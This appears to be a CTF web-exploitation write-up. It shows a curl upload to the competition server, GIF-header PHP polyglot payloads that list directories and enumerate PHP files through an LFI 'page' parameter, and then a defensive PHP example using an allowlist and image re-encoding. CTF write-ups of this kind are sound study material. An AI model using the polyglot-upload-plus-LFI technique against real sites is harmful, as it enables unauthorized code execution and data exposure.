Tuesday, August 4, 2020

[KMACTF] WEB-EXPLOITATION WRITE-UP!


WEB00: WARM UP



IT'S ALMOST THE EASIEST CHALL IN THIS COMPETITION!



THIS IS THE FIRST PART OF THE FLAG.





DECODE THIS 




FLAG KMACTF{Ctrl_U_is_helpful!_Wh4t_do3s_JS_Say.?}


WEB 01









THIS CHALL IS ABOUT LFI + FILE UPLOAD.
FIRSTLY, WE MUST BYPASS THE IMAGE UPLOAD MECHANISM. WE MUST UPLOAD WITH A CURL COMMAND.

curl -L -F 'file=@image.png' -H "API-KEY: my_api_key" http://cloud-storage.ctf.actvn.edu.vn:8080/api.php
MY "IMAGE" IS A FEW LINES OF PHP CODE WITH A GIF HEADER AND THE php.png EXTENSION TO BYPASS THE IMAGE UPLOAD RESTRICTIONS.

GIF89a;
 
<?php
$path = getcwd();
$items = scandir($path);

echo "<p>Content of $path</p>";
echo '<ul>';
foreach ($items as $item) {
    echo '<li>' . $item . '</li>';
}
echo '</ul>';
?> 

THE PHP CODE ABOVE GIVES US THE CURRENT DIRECTORY AND ALL THE FILES AND FOLDERS IN IT.


ACTUALLY, I DON'T HAVE MUCH EXPERIENCE WITH CURL. SO, WITH THIS CURL COMMAND, I COULDN'T UPLOAD THE IMAGE TO THE SERVER BECAUSE OF THE SINGLE QUOTES (' ') IN 'file=@image.png'. LET'S SEE!



AFTER REMOVING THE SINGLE QUOTES, I COULD UPLOAD THE "IMAGE" TO THE SERVER.

NEXT STEP: I INCLUDE THIS FILE VIA THE LFI PARAM "page".






SUCCESSFULLY!

I READ ALL THE FILES IN THIS FOLDER BUT FOUND NOTHING REALLY USEFUL.

SO I USED THIS CODE TO ENUMERATE ALL THE PHP FILES IN THE /home FOLDER:

GIF89a;
<?php
  
foreach (glob("/home/*.php") as $filename) {
    echo "$filename";
}
?> 
AND FORTUNATELY IT WORKS! THERE IS A FILE NAMED flag.php IN THIS FOLDER.

LET'S CHECK IT!


FLAG :KMACTF{php is not a good choice for web development} 
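
The two weaknesses chained above (an upload check that a GIF signature and a .png name can satisfy, and a "page" parameter that reaches include) can be closed as in the following added example. It is not the challenge's source code: PAGES, UPLOAD_DIR, MAX_BYTES, the pages/ directory and all function names are assumptions, and the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's source code. PAGES, UPLOAD_DIR and all
// function names are assumptions made for illustration. Requires ext-gd.
declare(strict_types=1);

const PAGES = ['home' => 'home.php', 'upload' => 'upload.php'];
const UPLOAD_DIR = '/var/data/uploads';  // assumed: outside the web root
const MAX_BYTES = 2 * 1024 * 1024;

// Include side: the ?page= value only selects a key from a fixed map, so a
// value that is a path into the upload folder resolves to nothing.
function resolve_page($page): ?string
{
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

// Upload side: the bytes must decode as an image. Extension, Content-Type and
// the first bytes are all client-controlled, so none of them is trusted.
function decode_image(string $data)
{
    if ($data === '' || strlen($data) > MAX_BYTES) {
        return null;
    }
    $img = @imagecreatefromstring($data);  // false when GD cannot parse it
    return $img === false ? null : $img;
}

// Store a re-encoded copy under a server-chosen name; the client's file name
// (for example "php.png") is never used.
function store_image(string $tmpPath): ?string
{
    $data = file_get_contents($tmpPath);
    $img = $data === false ? null : decode_image($data);
    if ($img === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.png';
    return imagepng($img, UPLOAD_DIR . '/' . $name) ? $name : null;
}

// Constructed inputs with the same shape as the upload and include above.
$polyglot = "GIF89a;\n<?php echo getcwd(); ?>";
var_dump(decode_image($polyglot));          // upload check
var_dump(resolve_page('uploads/php.png'));  // constructed path-style page value
var_dump(resolve_page('home'));             // allowlisted page
```

The allowlist on the include side is the primary control; re-encoding and storing uploads outside any path that include can reach are defense in depth.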
 




































